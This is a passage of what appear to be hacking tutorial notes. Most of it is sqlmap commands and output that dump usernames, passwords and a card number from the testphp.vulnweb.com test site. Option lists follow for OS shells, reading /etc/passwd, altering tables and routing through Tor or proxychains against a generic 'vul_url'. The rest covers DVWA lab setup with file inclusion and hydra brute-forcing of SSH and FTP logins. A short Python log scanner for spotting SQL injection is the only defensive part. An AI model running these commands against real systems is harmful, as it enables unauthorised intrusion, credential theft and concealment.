| Column | Type |
+-----------+-------------+
| adesc | text |
| aname | varchar(50) |
| artist_id | int(5) |
+-----------+-------------+
Database: acuart
Table: guestbook
[3 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| mesaj | text |
| sender | varchar(150) |
| senttime | int(32) |
+----------+--------------+
[22:15:27] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 22:15:27
----------------------------------------------
Listing the contents of two columns, uname and pass ( username and password ) :)
-D acuart = database
-T users = table ( of users )
-C uname,pass = lists the 2 columns ( username and password )
--dump = shows the data
----------------------------------------------
Type the command below on a single line.
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1"
-D acuart -T users -C uname,pass --dump
[*] starting at 22:26:26
[22:26:26] [INFO] resuming back-end DBMS 'mysql'
[22:26:26] [INFO] testing connection to the target URL
[22:26:27] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 5701=5701
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[22:26:27] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[22:26:27] [INFO] fetching entries of column(s) 'pass, uname' for table 'users'
in database 'acuart'
[22:26:27] [INFO] the SQL query used returns 1 entries
[22:26:27] [INFO] retrieved: "test","test"
[22:26:27] [INFO] analyzing table dump for possible password hashes
Database: acuart
Table: users
[1 entry]
+-------+------+
| uname | pass |
+-------+------+
| test | test |
+-------+------+
[22:26:27] [INFO] table 'acuart.users' dumped to CSV file
'/root/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[22:26:27] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 22:26:27
----------------------------------------------
Above you can see the username and the top-secret plain-text password... :)
Next we will test logging in to the site...
Accessing the data...
----------------------------------------------
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-user
[*] starting at 22:43:27
[22:43:27] [INFO] resuming back-end DBMS 'mysql'
[22:43:27] [INFO] testing connection to the target URL
[22:43:28] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 5701=5701
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[22:43:28] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[22:43:28] [INFO] fetching current user
current user: 'acuart@localhost'
[22:43:28] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 22:43:28
----------------------------------------------
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --users
[*] starting at 22:45:09
[22:45:10] [INFO] resuming back-end DBMS 'mysql'
[22:45:10] [INFO] testing connection to the target URL
[22:45:10] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 5701=5701
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[22:45:11] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[22:45:11] [INFO] fetching database users
[22:45:11] [INFO] the SQL query used returns 1 entries
[22:45:11] [INFO] retrieved: 'acuart'@'localhost'
database management system users [1]:
[*] 'acuart'@'localhost'
[22:45:11] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 22:45:11
----------------------------------------------
Checking open ports (-P0 is the old spelling of -Pn, skip host discovery; -sS, -sV and
-O need root, which the Kali session has).
nmap -sS -P0 -sV -O testphp.vulnweb.com
Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2016-06-12 22:57 EDT
Nmap scan report for testphp.vulnweb.com (176.28.50.165)
Host is up (0.25s latency).
rDNS record for 176.28.50.165: rs202995.rs.hosteurope.de
Not shown: 985 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3e
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7.1 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND none
80/tcp open http nginx 1.4.1
106/tcp open pop3pw poppassd
110/tcp open pop3 Courier pop3d
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
143/tcp open imap Plesk Courier imapd
445/tcp filtered microsoft-ds
465/tcp open ssl/smtp Postfix smtpd
993/tcp open ssl/imap Plesk Courier imapd
995/tcp open ssl/pop3 Courier pop3d
8443/tcp open http lighttpd
Aggressive OS guesses: Linux 2.6.32 (89%), QNAP NAS Firmware 3.8.3 (Linux 3.X) (87%),
IPFire firewall 2.11 (Linux 2.6.32) (87%), D-Link DSL-2890AL ADSL router (87%),
IPCop 1.9.19 or IPFire firewall 2.9 (Linux 2.6.32) (87%), OpenWrt Kamikaze 8.09
(Linux 2.6.25.20) (87%), Linux 2.6.36 (87%), Linux 3.2.1 (86%), Linux 2.6.35 (86%),
Check Point ZoneAlarm Z100G firewall (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Hosts: rs202995.rs.hosteurope.de, localhost.localdomain; OSs: Unix,
Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.11 seconds
----------------------------------------------
*** Type the command below on a single line.
Two things to check in this command: --tor-type and --tor-port only configure the proxy
that --tor switches on, so without --tor sqlmap talks to the target directly (add --tor,
and --check-tor to confirm the exit is really in use); and --random-agent overlaps with
the fixed User-Agent passed through --headers, so keep one of the two (the log below
shows the random agent being picked up).
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1"
--dbs --time-sec=3 --threads=3 --technique=BEUS --random-agent --no-cast
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0)
Gecko/20100101 Firefox/25.0" --tor-type=SOCKS5 --tor-port 9050
sqlmap {1.0-dev-nongit-201603300a89} http://sqlmap.org (banner and legal disclaimer as above)
[*] starting at 12:15:09
[12:15:09] [INFO] fetched random HTTP User-Agent header from file
'/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0
(Windows; U; Windows NT 6.1; en-US) AppleWebKit/525.19
(KHTML, like Gecko) Chrome/1.0.154.43 Safari/525.19'
[12:15:09] [INFO] testing connection to the target URL
[12:15:14] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[12:15:14] [INFO] testing if the target URL is stable
[12:15:15] [INFO] target URL is stable
[12:15:15] [INFO] testing if GET parameter 'artist' is dynamic
[12:15:15] [INFO] confirming that GET parameter 'artist' is dynamic
[12:15:15] [INFO] GET parameter 'artist' is dynamic
[12:15:15] [INFO] heuristic (basic) test shows that GET parameter 'artist' might be
injectable (possible DBMS: 'MySQL')
[12:15:16] [INFO] testing for SQL injection on GET parameter 'artist'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific
for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided
level (1) and risk (1) values? [Y/n] y
[12:15:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:15:20] [INFO] GET parameter 'artist' seems to be 'AND boolean-based blind - WHERE
or HAVING clause' injectable
[12:15:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause'
[12:15:21] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause'
[12:15:21] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (EXTRACTVALUE)'
[12:15:21] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (EXTRACTVALUE)'
[12:15:21] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (UPDATEXML)'
[12:15:22] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (UPDATEXML)'
[12:15:22] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (EXP)'
[12:15:22] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
[12:15:22] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (BIGINT UNSIGNED)'
[12:15:23] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause
(BIGINT UNSIGNED)'
[12:15:23] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause'
[12:15:23] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[12:15:23] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[12:15:24] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[12:15:24] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[12:15:25] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[12:15:25] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[12:15:25] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[12:15:25] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[12:15:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[12:15:26] [WARNING] time-based comparison requires larger statistical model, please wait.
[12:15:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[12:15:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[12:15:27] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[12:15:27] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[12:15:27] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[12:15:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:15:27] [INFO] automatically extending ranges for UNION query injection technique
tests as there is at least one other (potential) technique found
[12:15:28] [INFO] ORDER BY technique seems to be usable. This should reduce the time
needed to find the right number of query columns. Automatically extending the range
for current UNION query injection technique test
[12:15:29] [INFO] target URL appears to have 3 columns in query
[12:15:31] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) -
1 to 20 columns' injectable
GET parameter 'artist' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 46 HTTP(s) requests:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 5619=5619
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-8736 UNION ALL SELECT CONCAT(0x7170716a71,
0x4973546243766278496f444b6b44654762736b496c61444a6c68577a61714c68665071516f6b7469,
0x716b717871),NULL,NULL-- -
---
[12:16:02] [INFO] testing MySQL
[12:16:02] [INFO] confirming MySQL
[12:16:03] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.0
[12:16:03] [INFO] fetching database names
[12:16:03] [INFO] the SQL query used returns 2 entries
[12:16:03] [INFO] starting 2 threads
[12:16:03] [INFO] retrieved: acuart
[12:16:03] [INFO] retrieved: information_schema
available databases [2]:
[*] acuart
[*] information_schema
[12:16:03] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 12:16:03
----------------------------------------------
*** Type the command below on a single line:
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1"
--current-user --is-dba --current-db --hostname --time-sec=3 --threads=3
--technique=BEUS --random-agent
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201603300a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent
is illegal. It is the end user's responsibility to obey all applicable local, state and
federal laws. Developers assume no liability and are not responsible for any misuse or
damage caused by this program
[*] starting at 12:29:55
[12:29:55] [INFO] fetched random HTTP User-Agent header from file
'/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.9)
Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9'
[12:29:55] [INFO] resuming back-end DBMS 'mysql'
[12:29:55] [INFO] testing connection to the target URL
[12:29:56] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 5619=5619
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-8736 UNION ALL SELECT CONCAT(0x7170716a71,
0x4973546243766278496f444b6b44654762736b496c61444a6c68577a61714c68665071516f6b7469,
0x716b717871),NULL,NULL-- -
---
[12:29:56] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5
[12:29:56] [INFO] fetching current user
current user: 'acuart@localhost'
[12:29:56] [INFO] fetching current database
current database: 'acuart'
[12:29:56] [INFO] fetching server hostname
hostname: 'rs202995'
[12:29:57] [INFO] testing if current user is DBA
[12:29:57] [INFO] fetching current user
[12:29:57] [WARNING] in case of continuous data retrieval problems you are advised to
try a switch '--no-cast' or switch '--hex'
current user is DBA: False
[12:29:57] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 12:29:57
----------------------------------------------
Extracting the contents of the fields:
Type the line below on a single line:
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=2"
-D acuart -T users -C uname,pass,cc,name --dump --time-sec=3
--threads=3 --technique=BEUS --random-agent
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0)
Gecko/20100101 Firefox/25.0" --tor-type=SOCKS5 --tor-port 9050
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201603300a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent
is illegal. It is the end user's responsibility to obey all applicable local, state
and federal laws. Developers assume no liability and are not responsible for any misuse
or damage caused by this program
[*] starting at 13:33:01
[13:33:01] [INFO] fetched random HTTP User-Agent header from file
'/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE}
(Macintosh; I; PPC)'
[13:33:02] [INFO] resuming back-end DBMS 'mysql'
[13:33:02] [INFO] testing connection to the target URL
[13:33:02] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=2 AND 4071=4071
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-9556 UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7871,
0x554a4f78466953624f7376665a524e7a4c5867666476706566546a49634e6f545a76784d6c4a5745,
0x716b706a71)--
---
[13:33:02] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[13:33:02] [INFO] fetching entries of column(s) 'cc, name, pass, uname'
for table 'users' in database 'acuart'
[13:33:02] [INFO] the SQL query used returns 1 entries
[13:33:02] [INFO] resumed: "1234-5678-2300-9000","teste","test","test"
[13:33:02] [INFO] analyzing table dump for possible password hashes
Database: acuart
Table: users[1 entry]
+-------+------+---------------------+-------+
| uname | pass | cc | name |
+-------+------+---------------------+-------+
| test | test | 1234-5678-2300-9000 | teste |
+-------+------+---------------------+-------+
[13:33:02] [INFO] table 'acuart.users' dumped to CSV file
'/root/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[13:33:02] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 13:33:02
10 - Some more SqlMap Parameters
Type the line below on a single line:
proxychains sqlmap -u "vul_url" --dbs --time-sec=3 --threads=3 --technique=BEUS
--random-agent
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050
----------------------------------------------
Type the line below on a single line:
proxychains sqlmap -u "vul_url" --dbs --time-sec=3 --threads=3 --technique=BEUS
--random-agent --no-cast
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050
----------------------------------------------
Type the line below on a single line:
proxychains sqlmap -u "vul_url" --current-user --is-dba --current-db --hostname
--time-sec=3 --threads=3 --technique=BEUS --random-agent
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050
----------------------------------------------
proxychains sqlmap -u "vul_url" --current-user --is-dba --current-db --hostname
--time-sec=3 --threads=3 --technique=BEUS --random-agent
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050
----------------------------------------------
proxychains sqlmap -u "vul_url" --dbms=mysql -D data_base -T table --dump -C login,senha
----------------------------------------------
--level=3 --risk=3 --retries=3 --flush-session --hex --no-cast --batch --banner
--current-user --is-dba --current-db --hostname
--current-user --is-dba --parse-errors -v 3 ( show errors, messages )
--batch --tables --columns -T password --threads=8
--batch --dump -T password -C admin,pass --threads=8 --fresh-queries
--batch --banner --current-user --current-db
--users --current-db --dbs --exclude-sysdbs --tables --columns --flush-session --batch
--level=3 --risk=3 --forms --batch --banner --flush-session
--level=3 --risk=3 --forms --batch --banner --flush-session -p referer
--level=3 --risk=3 --flush-session --technique=B --batch
--level=3 --risk=3 --retries=3 --flush-session --hex --no-cast --batch --banner
----------------------------------------------
--technique=BEUST -s /tmp/scan_report.txt --flush-session -t /tmp/scan_trace.txt
--fresh-queries > /root/scan_out.txt
----------------------------------------------
--data="$(cat payload)" --prefix="1',1;" --suffix="-" --dns-domain=acme.com --os-shell
--fresh-queries --retries=5
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
----------------------------------------------
--dbms=mysql --level=3 --risk=3 --time-sec=3 --threads=3 --technique=BEUS --random-agent
--no-cast
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050 --tamper="between,randomcase,space2comment"
--data "login#2*&senha=123#1*" --alert --crawl=CRAWLDEPTH --regexp --string
--text-only --cookie "security=low; PHPSESSID=daa2374033f2a5fa6b57d9cc22692301"
----------------------------------------------
--batch --file-read="/etc/passwd"
--batch --forms --flush-session --delay=5 --tech=T --hex --crawl=3
--sql-query "SELECT * FROM users"
--sql-query="SELECT user,pass FROM usuarios WHERE user LIKE '%admin%'"
--sql-query "UPDATE databaseX.admin SET user='jura' WHERE username='aris'" -v 2
--sql-query="select * from transactions.sample_tran_table"
--users --passwords --privileges --roles --threads=10
--forms --batch --crawl=10 --cookie=jsessionid=12345 --level=5 --risk=3
--dbms="Microsoft Access"
--dbms="Microsoft SQL Server"
--dbms="PostgreSQL"
----------------------------------------------
--data "username=login#2*&senha=123#1*" --dbms=mysql --alert
--crawl=CRAWLDEPTH --level=5 --regexp --string --text-only
----------------------------------------------
--time-sec=7 --threads=3 --technique=BEUS --random-agent
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050
*** #2* and #1* indicate that these are POST fields and that they are the ones to be injected
----------------------------------------------
proxychains sqlmap -u "vul_url/index.php?page=login.php" --method "POST" --data
"user_name=admin&password=adminpass&Submit_button=Submit"
----------------------------------------------
-D mysql --sql-query="select usuario, senha from mysql.usuarios order by usuario desc"
-D mysql --sql-query="select column_name from information_schema.columns where
table_name = 'usuarios'"
----------------------------------------------
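The sqlmap runs above show what the boolean, UNION and tamper-transformed payloads look like on the wire; on the server side the same strings land in the access log. As an added example (not part of these notes), this Python script scans constructed Nginx-style log lines, undoes the randomcase and space2comment tampering before matching, and counts signature hits per client IP; the log lines and addresses are made up.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Constructed sample log lines in Nginx "combined" format (not real traffic).
# They mimic the payload shapes in the sqlmap output above, with and without
# the between/randomcase/space2comment tamper transformations.
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2017:12:15:21 +0000] "GET /artists.php?artist=1%20AND%205619%3D5619 HTTP/1.1" 200 4821 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
203.0.113.7 - - [12/May/2017:12:15:29 +0000] "GET /artists.php?artist=-8736%20UNION%20ALL%20SELECT%20CONCAT(0x7170716a71,0x41,0x716b717871),NULL,NULL--%20- HTTP/1.1" 200 4902 "-" "Mozilla/5.0"
198.51.100.9 - - [12/May/2017:12:16:03 +0000] "GET /artists.php?artist=2/**/uNiOn/**/aLl/**/sElEcT/**/NULL,NULL,cOnCaT(0x71,0x42,0x71)--%20- HTTP/1.1" 200 4902 "-" "Mozilla/4.7C-CCK-MCD"
198.51.100.9 - - [12/May/2017:12:16:04 +0000] "GET /artists.php?artist=2%20AND%204071%20BETWEEN%204071%20AND%204071 HTTP/1.1" 200 4821 "-" "Mozilla/4.7C-CCK-MCD"
192.0.2.50 - - [12/May/2017:12:17:00 +0000] "GET /artists.php?artist=3 HTTP/1.1" 200 4790 "-" "Mozilla/5.0"
192.0.2.50 - - [12/May/2017:12:17:05 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures run against a normalised query string: URL-decoded, inline
# comments collapsed to spaces, whitespace squeezed, lower-cased.
SIGNATURES = {
    "boolean_tautology": re.compile(r"\b(and|or)\s+(\d+)\s*=\s*\2\b"),
    "boolean_between":   re.compile(r"\b(and|or)\s+(\d+)\s+between\s+\2\s+and\s+\2\b"),
    "union_select":      re.compile(r"\bunion\s+(all\s+)?select\b"),
    "hex_concat_marker": re.compile(r"\bconcat\s*\(\s*0x[0-9a-f]+"),
    "error_based_xml":   re.compile(r"\b(extractvalue|updatexml)\s*\("),
}

def normalise_query(raw_path: str) -> str:
    """Canonical form of the query string that defeats randomcase and
    space2comment style tampering: decode, strip /**/ comments, fold case."""
    query = raw_path.partition("?")[2]
    decoded = unquote_plus(query)
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)   # space2comment -> spaces
    decoded = re.sub(r"\s+", " ", decoded)          # squeeze whitespace
    return decoded.lower()                          # randomcase -> lower

def classify(query: str) -> list[str]:
    """Names of every signature that matches the normalised query."""
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]

def scan_log(text: str) -> dict[str, Counter]:
    """Scan log lines; return {client_ip: Counter(signature -> hits)},
    only for clients that triggered at least one signature."""
    hits: dict[str, Counter] = defaultdict(Counter)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for name in classify(normalise_query(m.group("path"))):
            hits[m.group("ip")][name] += 1
    return dict(hits)

if __name__ == "__main__":
    for ip, counter in scan_log(SAMPLE_LOG).items():
        print(ip, dict(counter))
```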
11 - Setting up dvwa lab
Installing the DVWA lab
On Kali, open the Firefox browser and go to the URL -> www.dvwa.co.uk
Click the "download" button; the file "DVWA-master.zip" will be saved in the "Downloads" folder
cd Downloads
unzip DVWA-master.zip
mv DVWA-master /var/www/html/dvwa
cd /var/www/html
chmod -R 755 dvwa
cd dvwa/config
cp config.inc.php.dist config.inc.php
-----------------------------
Change some of the lines below...
nano /var/www/html/dvwa/config/config.inc.php
$DBMS = 'MySQL';
# Leave the lines below as shown:
$_DVWA = array();
$_DVWA[ 'db_server' ] = '127.0.0.1';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ] = 'root';
$_DVWA[ 'db_password' ] = '';
$_DVWA[ 'recaptcha_public_key' ] = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';
$_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';
-----------------------------
mysql -u root -p
create database dvwa;
quit
-----------------------------
chmod -R 777 /var/www/html/dvwa/hackable/uploads/
chmod -R 777 /var/www/html/dvwa/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt
-----------------------------
nano /etc/php/7.0/apache2/php.ini
allow_url_include = on
-----------------------------
service apache2 start
service mysql start
service mysql status
service apache2 status
-----------------------------
http://192.168.2.193/dvwa/setup.php
User: admin Pass: password
Enter the server's IP (Kali) and click the "Submit" button
-----------------------------
File Inclusion
http://192.168.2.193/dvwa/vulnerabilities/fi/?page=include.php
http://192.168.2.193/dvwa/vulnerabilities/fi/?page=/etc/passwd
12 - Cracking password with "hydra"
In the Kali 2.0 terminal, type the commands below:
nmap -sS -sC -sV 192.168.2.193
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-12 01:07 EDT
Nmap scan report for 192.168.2.193
Host is up (0.0000020s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 7d:a9:70:d3:55:c8:cc:6e:c4:ca:c9:c0:0b:bd:3a:a3 (RSA)
|_ 256 dc:c1:af:2d:fc:d4:a6:6a:49:5e:4d:b8:d2:9a:d1:19 (ECDSA)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Example 1
hydra -l jura -P passlist.txt 192.168.2.193 ssh -v -V
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-12 01:01:33
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 6 tasks per 1 server, overall 64 tasks, 6 login tries (l:1/p:6), ~0 tries per task
[DATA] attacking service ssh on port 22
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://192.168.2.193:22
[INFO] Successful, password authentication is supported by ssh://192.168.2.193:22
[ATTEMPT] target 192.168.2.193 - login "jura" - pass "123" - 1 of 6 [child 0] (0/0)
[ATTEMPT] target 192.168.2.193 - login "jura" - pass "jura" - 2 of 6 [child 1] (0/0)
[ATTEMPT] target 192.168.2.193 - login "jura" - pass "eu" - 3 of 6 [child 2] (0/0)
[ATTEMPT] target 192.168.2.193 - login "jura" - pass "pizza" - 4 of 6 [child 3] (0/0)
[ATTEMPT] target 192.168.2.193 - login "jura" - pass "test" - 5 of 6 [child 4] (0/0)
[ATTEMPT] target 192.168.2.193 - login "jura" - pass "teste" - 6 of 6 [child 5] (0/0)
[22][ssh] host: 192.168.2.193 login: jura password: 123
[STATUS] attack finished for 192.168.2.193 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-12 01:01:35
Let's create a file with a few passwords.
cat > passlist.txt
123
jura
eu
pizza
test
teste
admin
winner
ctrl + d (save and exit)
Example 2
hydra 192.168.2.13 ftp -s 50000 -L /root/users.txt -P /root/passlist.txt
